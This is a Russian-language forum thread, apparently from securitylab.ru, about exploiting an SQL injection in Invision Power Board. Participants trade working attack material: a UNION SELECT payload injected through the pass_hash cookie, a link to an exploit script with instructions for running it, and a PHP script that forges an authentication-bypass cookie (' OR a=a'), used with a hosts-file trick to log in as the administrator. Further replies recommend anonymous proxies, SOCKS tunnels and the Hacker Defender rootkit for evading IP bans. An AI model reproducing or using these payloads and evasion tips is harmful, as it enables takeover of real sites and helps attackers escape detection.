Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: 1 2 След.
RSS
SQL-инъекция и межсайтовый скриптинг в Invision Power Board
 
Обсуждение статьи SQL-инъекция и межсайтовый скриптинг в Invision Power Board
 
Блин, опять!
Как меня достали эти баги!
Кто-нить знает форум без дыр?
 
Хм, таких форумов не так много, с выключенной Magic_quotes_gpc.
 
А где Exploit ?
 
хоть чуть чуть бы поподробнее,хотяб наглядный пример инекции...
 
сори не глянул в исходный источник...
 
плз, покажите пример
 
а при чём тут url? Как я понял нужно править pass_hash в куках. Что то типа

pass_hash -99%27%20UNION%20SELECT%20*%20FROM%20ibf_members WHERE%20id=2/*

хотя не разобрался ещё
 
как разберешся сскажи, лана?
 
http://www.securityfocus.com/data/vulnerabilities/exploits/i nvision.php
Дальше дело техники...
 
rBo3guK Мля, что-то невыходит(((
Объясни плз как его юзать!
 
Разумеется не везде работает, незабывай о Magic_quotes_gpc.
Чё там объяснять вводишь данные и всё.
 
и все равно не работает.. кто нить смог этот сплоит заупустить у меня выдет все по нулям.. если заменить в тексте обратные кавычки на простые то ничего не находит и просто прогоняет всю структуру по циклу 16*32
 
кароче делаем так :)
берем id админа, далее
ставим куки себе... скажем редактируя /etc/hosts на предмет нужного домена на локалхост, далее в браузере локально пишем данный домен, попадаем на 127.0.0.1, где висит httpd с нужным кукис-скриптом
Содержание данного скрипта примерно такое
Код
<?php
// IPB set&#099;ookie sploit
$id = (isset($_GET[id])) ? intval($_GET[id]) : 1;
set&#099;ookie("member_id", $id, time() + (3600*24*30));
set&#099;ookie("pass_hash", " OR a=a", time() + (3600*24*30));
echo "Done";
?>

Воть. Далее - вырубаем браузер, удаляем запись в /etc/hosts и опять пускаем его. Должно пустить.
Все киддисы поняли?
P.S. Для виндузятников: %WINDIR%/system32/drivers/etc/hosts
P.P.S. Там кой-где кавычки не выставлены, но думаю разберетесь...
 
kreon
А можешь поподробнее для глупых виндоузников?
Если ип с которого будет производиться атака будет забаннен то работать ббудет?
 
Цитата
FireFox пишет:
kreon
А можешь поподробнее для глупых виндоузников?
Если ип с которого будет производиться атака будет забаннен то работать ббудет?
юзай анонимные прокси, будет у тебя другой IP
 
Цитата
http://www.securityfocus.com/data/vulnerabilities/exploits/i nvision.php

usage:
php -c /tmp/php.ini.fake invision.php

/tmp/php.ini.fake
----------------------------
max_execution_time = 3600
 
Цитата
юзай анонимные прокси, будет у тебя другой IP
Чтобы заюзать эксплоит надо создавать туннель через сокс сервер. Хотя я это делаю через Mapped Port в Hacker Defender [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
 
Цитата
rav3n пишет:
Чтобы заюзать эксплоит надо создавать туннель через сокс сервер. Хотя я это делаю через Mapped Port в Hacker Defender [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
Не знакомо такое...
а что, лучше соксчайника?
 
Как пользоваться сплойтом?
Страницы: 1 2 След.
Читают тему (гостей: 1)